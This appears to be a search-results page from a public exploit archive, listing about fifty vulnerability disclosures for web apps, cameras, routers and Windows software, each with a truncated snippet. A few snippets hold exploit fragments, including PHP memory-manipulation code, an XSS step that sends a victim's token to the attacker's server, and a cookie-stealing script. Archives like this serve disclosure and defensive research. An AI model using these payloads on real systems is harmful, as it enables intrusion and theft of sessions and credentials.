47904 matches found
Selea Targa IP OCR-ANPR Camera - CSRF Add Admin
Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin Date: 07.11.2020 Exploit Author: LiquidWorm Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa...
Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF
Exploit Title: Genexis Platinum-4410 P4410-V2-1.28 - Broken Access Control and CSRF Date: 28-08-2020 Vendor Homepage: https://www.gxgroup.eu/ont-products/ Exploit Author: Jinson Varghese Behanan @JinsonCyberSec Author Advisory:...
RSA IG&L Aveksa 7.1.1 - Remote Code Execution
Exploit Title: RSA IG&L Aveksa 7.1.1 - Remote Code Execution Date: 2019-04-16 Exploit Author: Jakub Palaczynski, Lukasz Plonka Vendor Homepage: https://www.rsa.com/ Version: 7.1.1, prior to P02 CVE : CVE-2019-3759 all vulnerable versions can be found at...
Rocket.Chat 2.1.0 - Cross-Site Scripting
Title: Rocket.Chat 2.1.0 - Cross-Site Scripting Author: 3H34N Date: 2019-10-22 Product: Rocket.Chat Vendor: https://rocket.chat/ Vulnerable Versions: Rocket.Chat 2. Open a chat session 3. Send payload with your web server url 4. Token will be written in logs.txt when target seen your message...
PHP 7.0 < 7.3 (Unix) - 'gc' disable_functions Bypass
= 0; $j-- $address = 8; return $out; function write&$str, $p, $v, $n = 8 $i = 0; for$i = 0; $i = 8; function leak$addr, $p = 0, $s = 8 global $abc, $helper; write$abc, 0x68, $addr + $p - 0x10; $leak = strlen$helper-a; if$s != 8 $leak %= 2 $s 8 - 1; return $leak; function parseelf$base $etype =...
Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts
Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs such as web browsers and constitutes an attack surface for memory corruption bugs, as it...
Jenkins Dependency Graph View Plugin 0.13 - Persistent Cross-Site Scripting
Exploit Title: Persistent XSS - Dependency Graph View Pluginv0.13 Vendor Homepage: https://wiki.jenkins.io/display/JENKINS/Dependency+Graph+View+Plugin Exploit Author: Ishaq Mohammed Contact: https://twitter.com/securityprince Website: https://about.me/security-prince Category: webapps Platform:...
D3Jeeb Pro 3 - 'catogary.php?catid' SQL Injection
source: https://www.securityfocus.com/bid/16853/info D3Jeeb is prone to multiple SQL-injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in an SQL query. Successful exploitation could allow an attacker to...
Freefloat FTP Server 1.0 - Remote Buffer Overflow
Exploit Title: Freefloat FTP Server 1.0 - Remote Buffer Overflow Date: 22 may 2025 Notification vendor: No reported Discovery by: Fernando Mengali LinkedIn: https://www.linkedin.com/in/fernando-mengali-273504142/ Version: 1.0 Tested on: Windows XP SP3 English - Version 5.1 Build...
Apache HugeGraph Server 1.2.0 - Remote Code Execution (RCE)
Exploit Title: Apache HugeGraph Server 1.2.0 - Remote Code Execution RCE Exploit Author: Yesith Alvarez Vendor Homepage: https://hugegraph.apache.org/docs/download/download/ Version: Apache HugeGraph 1.0.0 - 1.2.0 CVE : CVE-2024–27348 from requests import Request, Session import sys import json d...
Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
Chyrp 2.5.2 - Stored Cross-Site Scripting XSS Date: 2024-04-24 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://github.com/chyrp/ Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip Version: 2.5.2 Tested on: MacOS Steps to Reproduce - Login from the address:...
WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution
Exploit Title: WordPress Plugin Forminator 1.24.6 - Unauthenticated Remote Command Execution Date: 2023-07-20 Exploit Author: Mehmet Kelepçe Vendor Homepage: https://wpmudev.com/project/forminator-pro/ Software Link: https://wordpress.org/plugins/forminator/ Version: 1.24.6 Tested on: PHP - Mysql...
ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE)
Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution RCE Google Dork: None Date: July 31, 2023 Exploit Author: Riyan Firmansyah of Seclab Vendor Homepage: https://ruijienetworks.com Software Link: https://www.ruijienetworks.com/support/documents/slideEW1200G-PRO-Firmware-B11P204 Version...
Webile v1.0.1 - Multiple Cross Site Scripting
Exploit Title: Webile v1.0.1 - Multiple Cross Site Scripting References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2321 Release Date: ============= 2023-07-03 Vulnerability Laboratory ID VL-ID: ==================================== 2321 Common Vulnerability...
RaidenFTPD 2.4.4005 - Buffer Overflow (SEH)
Exploit Title: RaidenFTPD 2.4.4005 - Buffer Overflow SEH Date: 18/07/2023 Exploit Author: Andre Nogueira Vendor Homepage: https://www.raidenftpd.com/en/ Software Link: http://www.raidenmaild.com/download/raidenftpd2.exe Version: RaidenFTPD 2.4.4005 Tested on: Microsoft Windows 10 Build 19045 1.-...
CmsMadeSimple v2.2.17 - Remote Code Execution (RCE)
Exploit Title: CmsMadeSimple v2.2.17 - Remote Code Execution RCE Application: CmsMadeSimple Version: v2.2.17 Bugs: Remote Code ExecutionRCE Technology: PHP Vendor URL: https://www.cmsmadesimple.org/ Software Link: https://www.cmsmadesimple.org/downloads/cmsms Date of found: 12-07-2023 Author:...
Macro Expert 4.9 - Unquoted Service Path
Exploit Title: Macro Expert 4.9 - Unquoted Service Path Date: 04/06/2023 Exploit Author: Murat DEMIRCI Vendor Homepage: http://www.macro-expert.com/ Software Link: http://www.macro-expert.com/product/gmsetup4.9.exe Version: 4.9 Tested on: Windows 10 Proof of Concept : C:\Users\Muratsc qc "Macro...
Marval MSM v14.19.0.12476 - Cross-Site Request Forgery (CSRF)
Exploit Title: Marval MSM v14.19.0.12476 - Cross-Site Request Forgery CSRF Date: 27/5/2022 Exploit Author: Momen Eldawakhly Cyber Guy Vendor Homepage: https://www.marvalnorthamerica.com/ Software Link: https://www.marvalnorthamerica.com/ Version: v14.19.0.12476 Tested on: Windows PoCs:...
Anuko Time Tracker - SQLi (Authenticated)
Exploit Title: Anuko Time Tracker - SQLi Authenticated Date: 2022-05-03 Exploit Author: Altelus Vendor Homepage: https://www.anuko.com/ Software Link: https://github.com/anuko/timetracker/tree/0924ef499c2b0833a20c2d180b04fa70c6484b6d Version: Anuko Time Tracker 1.20.0.5640 Tested on: Linux CVE :...
H3C SSL VPN - Username Enumeration
Exploit Title: H3C SSL VPN - Username Enumeration Exploit Author: LiquidWorm H3C SSL VPN Username Enumeration Vendor: Hangzhou H3C Technologies Co. | New H3C Technologies Co., Ltd. Product web page: https://www.h3c.com Affected version: n/a Summary: H3C SSL VPN is a secure VPN system based on SSL...
WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting (XSS)
Exploit Title: WordPress Plugin Product Slider for WooCommerce 1.13.21 - Cross Site Scripting XSS Date: 3/16/2021 Author: 0xB9 Software Link: https://wordpress.org/plugins/woocommerc...ts-slider/ Version: 1.13.21 Tested on: Windows 10 CVE: CVE-2021-24300 1. Description: This plugin is a easy...
uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting (XSS)
Exploit Title: uBidAuction v2.0.1 - 'Multiple' Cross Site Scripting XSS Exploit Author: Vulnerability-Lab Date: 21/01/2022 Document Title: =============== uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities References Source: ====================...
Magic Home Pro 1.5.1 - Authentication Bypass
Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass Google Dork: NA Date: 22 October 2020 Exploit Author: Victor Hanna Trustwave SpiderLabs Author Github Page: https://9lyph.github.io/CVE-2020-27199/ Vendor Homepage: http://www.zengge.com/appkzd Software Link:...
ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection
Exploit Title: ManageEngine Applications Manager 13 - 'MenuHandlerServlet' SQL Injection Google Dork: intitle:"Applications Manager Login Screen" Date: 2020-07-23 Exploit Author: aldorm Vendor Homepage: https://www.manageengine.com/ Software Link: Version: 12 and 13 before Build 13200 Tested on:...
ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure
Title: ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure Author: Todor Donev Date: 2020-02-23 Vendor: www.escam.cn Product Link: http://www.escam.cn/search/?class1=&class2=&class3=&searchtype=0&searchword=qd-900&lang=en CVE: N/A !/usr/bin/perl ESCAM QD-900 WIFI HD Camera Remote...
Cisco Wireless Controller 3.6.10E - Cross-Site Request Forgery
Product : Cisco Wireless Controller Version : 3.6.10E last version Date: 23.07.2019 Vendor Homepage: https://www.cisco.com Exploit Author: Mehmet Önder Key Website: htts://cloudvist.com CVE: CVE-2019-12624 Description : The application interface allows users to perform certain actions via HTTP...
Oracle Weblogic Server - 'AsyncResponseService' Deserialization Remote Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService ', 'Description' = %q An unauthenticated attacker with network access to the...
WordPress Plugin Ad Manager WD 1.0.11 - Arbitrary File Download
Exploit Title: WordPress Plugin ad manager wd v1.0.11 - Arbitrary File Download Google Dork: N/A Date: 25.01.2019 Vendor Homepage: https://web-dorado.com/products/wordpress-ad-manager-wd.html Software: https://wordpress.org/plugins/ad-manager-wd Version: 1.0.11 Tested on: Win7 x64, Exploit Author...
MySQL 5.5.45 - procedure analyse Function Denial of Service
!/usr/bin/env python Title: MySQL Procedure Analyse DoS Exploit Author: Osanda Malith Jayathissa @OsandaMalith E-Mail: osandacatunseen.is Version: Vulnerable upto MySQL 5.5.45 Original Write-up: https://osandamalith.wordpress.com/2016/05/29/mysql-dos-in-the-procedure-analyse-function-cve-2015-487...
unclassified NewsBoard 1.6.4 - Multiple Vulnerabilities
Author girex Homepage girex.altervista.org Date 31/05/2009 CMS Unclassified NewsBoard 1.6.4 and maybe lower Dork "This board is powered by the Unclassified NewsBoard software, 1.6.4" Multiple remote vulnerabilities 1 Remote SQL Injection php.ini regardless 2 Logs File Disclosure registerglobals =...
Libc - 'libc:fts_*()' Local Denial of Service
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 libc:fts:multiple vendors, Denial-of-service Author: Maksymilian Arciemowicz SecurityReason.com Date: - - Dis.: 21.10.2008 - - Pub.: 04.03.2009 CVE: CVE-2009-0537 We are going informing all vendors, about this problem. Affected Software official: - -...
phpPC 1.04 - Multiple Remote File Inclusions
phpPC 1.04 Multiples Remote File Inclusion Script : PHP Poll Creator Version : 1.04 Vendor URL : http://www.phppc.de Impact : Remote File Inclusion Discovered by : iss4m Contact : [email protected] Vulnerable code in poll.php -------------------------------- ?php if $isphppcincluded != 1 include...
Enrollment System v1.0 - SQL Injection
Exploit Title: Enrollment System v1.0 - SQL Injection Date: 27 December 2023 Exploit Author: Gnanaraj Mauviel @0xm3m Vendor: Obi08 Vendor Homepage: https://github.com/Obi08/EnrollmentSystem Software Link: https://github.com/Obi08/EnrollmentSystem Version: v1.0 Tested on: Mac OSX, XAMPP, Apache,...
CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection (SSTI)
Exploit Title: CmsMadeSimple v2.2.17 - session hijacking via Server-Side Template Injection SSTI Application: CmsMadeSimple Version: v2.2.17 Bugs: SSTI Technology: PHP Vendor URL: https://www.cmsmadesimple.org/ Software Link: https://www.cmsmadesimple.org/downloads/cmsms Date of found: 13-07-2023...
Opmon 9.11 - Cross-site Scripting
Exploit Title: Opmon 9.11 - Cross-site Scripting Date: 2021-06-01 Exploit Author: p3tryx Vendor Homepage: https://www.opservices.com.br/monitoramento-real-time Version: 9.11 Tested on: Chrome, IE and Firefox CVE : CVE-2021-43009 URL POC: alertdocument.cookie; var i=new Image;...
BattlEye 0.9 - 'BEService' Unquoted Service Path
Exploit Title: BattlEye 0.9 - 'BEService' Unquoted Service Path Date: 09/03/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://www.battleye.com/ Software Link: https://www.battleye.com/downloads/ Version: 0.94 Tested: Windows 10 Pro Contact: https://twitter.com/dmaral3noz C:\Users\saudhsc...
Hasura GraphQL 2.2.0 - Information Disclosure
Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure Software: Hasura GraphQL Community Software Link: https://github.com/hasura/graphql-engine Version: 2.2.0 Exploit Author: Dolev Farhi Date: 5/05/2022 Tested on: Ubuntu import requests SERVERADDR = 'x.x.x.x' url =...
Automox Agent 32 - Local Privilege Escalation
Exploit Title: Automox Agent 32 - Local Privilege Escalation Date: 13/12/2021 Exploit Author: Greg Foss Writeup: https://www.lacework.com/blog/cve-2021-43326/ Vendor Homepage: https://www.automox.com/ Software Link: https://support.automox.com/help/agents Version: 31, 32, 33 Tested on: Windows 10...
Exponent CMS 2.6 - Multiple Vulnerabilities
Exploit Title: Exponent CMS 2.6 - Multiple Vulnerabilities Exploit Author: heinjame Date: 22/10/2021 Exploit Author: picaroo Vendor Homepage: https://www.exponentcms.org/ Version: http://127.0.0.1:8082/expcms/text/edit/id/id/src/@footer Title, Text Block Payload = " Database credential are...
Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection Date: 07.10.2021 Exploit Author: Amine ismail @aminei Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html Software Link:...
Teachers Record Management System 1.0 - 'Multiple' SQL Injection (Authenticated)
Exploit Title: Teachers Record Management System 1.0 – Multiple SQL Injection Authenticated Date: 05-10-2021 Exploit Author: nhattruong Vendor Homepage: https://phpgurukul.com Software Link: https://phpgurukul.com/teachers-record-management-system-using-php-and-mysql/ Version: 1.0 Tested on:...
Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated)
Exploit Title: Schlix CMS 2.2.6-6 - Arbitary File Upload And Directory Traversal Leads To RCE Authenticated Date: 21.05.2021 Exploit Author: Emir Polat Vendor Homepage: https://www.schlix.com/ Software Link: https://www.schlix.com/html/schlix-cms-downloads.html Version: 2.2.6-6 Tested On: Ubuntu...
Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path
Exploit Title: Sandboxie Plus v0.7.2 - 'SbieSvc' Unquoted Service Path Date: 2021-1-20 Exploit Author: Mohammed Alshehri Vendor Homepage: sandboxie-plus.com Software Link: https://github.com/sandboxie-plus/Sandboxie/releases/download/0.7.2/Sandboxie-Plus-x64-v0.7.2.exe Version: Version 0.7.2 Test...
Tasks 9.7.3 - Insecure Permissions
Exploit Title: Tasks 9.7.3 - Insecure Permissions Date: 18th of July, 2020 Exploit Author: Lyhin's Lab Detailed Bug Description: https://lyhinslab.org/index.php/2020/07/18/how-the-white-box-hacking-works-ok-google-i-wanna-pwn-this-app/ Vendor Homepage: https://tasks.org/ Software Link:...
iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path
Exploit Title: iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path Discovery by: Leslie Lara Discovery Date: 7-09-2020 Vendor Homepage: https://www.huawei.com/en/corporate-information Software Links :...
MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation
/ Exploit Title: MSI Ambient Link Driver 1.0.0.8 - Local Privilege Escalation Date: 2020-09-24 Exploit Author: Matteo Malvica Vendor Homepage: https://www.msi.com Software Link: https://msi.gm/ABLTMNB Driver: MSIO64.sys SHA256: 525D9B51A80CA0CD4C5889A96F857E73F3A80DA1FFBAE59851E0F51BDFB0B6CD...
Online Book Store 1.0 - Arbitrary File Upload
Exploit Title: Online Book Store 1.0 - Arbitrary File Upload Google Dork: N/A Date: 2020-01-16 Exploit Author: Or4nG.M4n aka S4udiExploit Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ Software Link:...
Microsoft DirectWrite / AFDKO - Stack Corruption in OpenType Font Handling While Processing CFF Blend DICT Operator
-----===== Background =====----- AFDKO Adobe Font Development Kit for OpenType is a set of tools for examining, modifying and building fonts. The core part of this toolset is a font handling library written in C, which provides interfaces for reading and writing Type 1, OpenType, TrueType to some...
Joomla! Component JHotelReservation 6.0.7 - SQL Injection
Exploit Title: Joomla! Component JHotelReservation 6.0.7 - SQL Injection Dork: N/A Date: 2019-01-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://cmsjunkie.com/ Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jhotelreservation/...
Joomla! Component vBizz 1.0.7 - SQL Injection
Exploit Title: Joomla! Component vBizz 1.0.7 - SQL Injection Dork: N/A Date: 2019-01-23 Exploit Author: Ihsan Sencan Vendor Homepage: http://wdmtech.com/ Software Link: https://extensions.joomla.org/extensions/extension/marketing/crm/vbizz/ Version: 1.0.7 Category: Webapps Tested on:...